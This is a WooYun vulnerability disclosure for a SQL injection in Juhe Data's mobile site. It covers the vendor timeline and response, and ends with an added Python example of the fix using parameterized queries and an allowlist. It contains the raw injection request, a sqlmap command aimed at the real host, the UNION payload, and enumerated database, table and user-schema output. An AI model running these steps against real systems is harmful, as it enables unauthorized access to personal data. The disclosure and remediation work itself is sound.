Vulnerability Summary

Defect ID: wooyun-2015-089920

Title: SQL injection in a Juhe Data (聚合数据) system exposes a large amount of information

Vendor: 聚合数据 (Juhe Data)

Author: 路人甲

Submitted: 2015-01-04 15:30

Fixed: 2015-02-18 15:32

Published: 2015-02-18 15:32

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]


Vulnerability Details

Disclosure status:

2015-01-04: Details sent to the vendor; awaiting vendor action
2015-01-04: Vendor confirmed; details disclosed to the vendor only
2015-01-14: Details disclosed to core white hats and relevant domain experts
2015-01-24: Details disclosed to regular white hats
2015-02-03: Details disclosed to intern white hats
2015-02-18: Details disclosed to the public

Brief description:

SQL injection in a Juhe Data system exposes a large amount of information

Detailed description:

Site: http://m.juhe.cn

POST /data/index HTTP/1.1
Host: m.juhe.cn
Accept: */*
Accept-Language: en
dataname=Peter+Winter&interface_btn=%0d


The dataname field is not filtered before it reaches the query.

sqlmap.py -u "http://m.juhe.cn/data/index" --data="dataname=Peter+Winter&interface_btn=%0d" --tamper="tamper/charencode.py" --dbs


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: dataname (POST)
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: dataname=Peter Winter') UNION ALL SELECT CONCAT
(0x7176767671,0x644e486e6c637559504b,0x71706b7671),NULL#&interface_btn=
---
web application technology: Apache
back-end DBMS: MySQL 5
current user: 'juheuser@%'
available databases [6]:
[*] information_schema
[*] mobile_juhe
[*] op.ofpay
[*] test
[*] ucenter
[*] weizhang_weiche


Taking a look at mobile_juhe:

Database: mobile_juhe
[58 tables]
+---------------------+
| adm_access_a |
| adm_access_c |
| adm_admin |
| adm_group |
| adm_group_access |
| adm_logs |
| chinajoy_awardlogs |
| chinajoy_awards |
| chinajoy_ips |
| foreign_apis |
| lottery_award_count |
| lottery_logs |
| lottery_user_award |
| lottery_user_count |
| lottery_users_fanli |
| m_account |
| m_account_pay_logs |
| m_announcement |
| m_apiaccount_logs |
| m_apipay_logs |
| m_banner |
| m_bindmail_code |
| m_category |
| m_channel |
| m_channel_report |
| m_coins_activity |
| m_coins_exchange |
| m_data |
| m_data_api |
| m_data_delete_logs |
| m_data_errcode |
| m_data_package |
| m_data_price |
| m_intro_logs |
| m_login_logs |
| m_loginad |
| m_loginerr |
| m_member |
| m_message |
| m_mobilecode |
| m_news |
| m_news_category |
| m_pay_logs |
| m_paycoin_logs |
| m_qa |
| m_qa_answer |
| m_qa_category |
| m_qa_tags |
| m_sq |
| m_sq_logs |
| m_user_api |
| m_user_buylogs |
| m_user_coin |
| m_user_coin_logs |
| m_user_forget |
| m_user_newbuylogs |
| m_user_regist_logs |
| view_data |
+---------------------+


A peek at m_member, which holds more than 90,000 rows:

Table: m_member
[18 columns]
+-------------+------------------+
| Column | Type |
+-------------+------------------+
| channel | varchar(32) |
| email | varchar(128) |
| id | int(10) unsigned |
| lastlogin | datetime |
| mobileact | tinyint(1) |
| mobilephone | char(11) |
| nickname | varchar(64) |
| openid | char(34) |
| realname | varchar(64) |
| regip | varchar(16) |
| regtime | timestamp |
| type | int(1) |
| uid | varchar(64) |
| vcard | tinyint(1) |
| vcardimg | varchar(128) |
| vcardno | varchar(32) |
| vcardtime | datetime |
| vcardtips | varchar(64) |
+-------------+------------------+


There seems to be quite a lot of information here, so I did not go any deeper.

Proof of vulnerability:

See the detailed description.

Fix:

Restrict it.
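The report's finding is that the dataname POST field is spliced into a MySQL query unfiltered, and the suggested fix is simply to restrict it. The following added example (not code from the report or from Juhe Data) shows what that restriction looks like in practice: the string-concatenation pattern that lets a closing quote end the SQL literal, beside a hardened lookup that binds the value as a parameter and applies an allowlist first. It uses an in-memory SQLite table with constructed rows; the table name m_data and its columns are assumptions, since the page shows only database and table names, not the query behind /data/index. The injection string is the one sqlmap reported on the page, reused here only to show that the hardened lookup treats it as an ordinary, non-matching name.

```python
import re
import sqlite3

# Constructed stand-in rows for the site's data catalogue (assumed schema).
SAMPLE_ROWS = [
    (1, "Peter Winter", "weather lookup"),
    (2, "Alice Summer", "postcode lookup"),
]

# The payload sqlmap reported for the dataname field, taken from the report.
INJECTED = ("Peter Winter') UNION ALL SELECT "
            "CONCAT(0x7176767671,0x644e486e6c637559504b,0x71706b7671),NULL#")


def make_db():
    """In-memory SQLite database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE m_data (id INTEGER PRIMARY KEY, name TEXT, intro TEXT)"
    )
    conn.executemany("INSERT INTO m_data VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def build_query_unsafe(dataname):
    """The defect the report describes: the POST field is concatenated into
    the SQL text, so a quote in the input closes the literal and the rest of
    the input is parsed as SQL. Returned as text only; never executed here."""
    return "SELECT id, name FROM m_data WHERE name IN ('" + dataname + "')"


def is_valid_dataname(dataname):
    """Allowlist: a data set name is word characters, spaces, dots and
    hyphens, at most 64 characters. Quotes, parentheses and '#' are rejected."""
    return re.fullmatch(r"[\w .\-]{1,64}", dataname) is not None


def lookup_safe(conn, dataname):
    """Hardened form: the value travels as a bound parameter, so the database
    never parses it as SQL. An injection string simply matches no row."""
    cur = conn.execute("SELECT id, name FROM m_data WHERE name = ?", (dataname,))
    return cur.fetchall()


def handle_request(conn, dataname):
    """What the /data/index handler should do: validate, then query with
    parameters. Both layers are independent; either alone stops this bug."""
    if not is_valid_dataname(dataname):
        return []
    return lookup_safe(conn, dataname)


if __name__ == "__main__":
    db = make_db()
    print("unsafe query text:", build_query_unsafe(INJECTED))
    print("hardened, normal input:", handle_request(db, "Peter Winter"))
    print("hardened, injected input:", handle_request(db, INJECTED))
```

The allowlist is the cheap first line of defence and gives you a log event to alert on when it fires; the bound parameter is the one that actually removes the bug, because it holds even for names the allowlist has to permit.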

Copyright notice: when reposting, please credit the source: 路人甲@乌云 (WooYun)


Vulnerability Response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-01-04 15:33

Vendor reply:

Thanks

Latest status:

None yet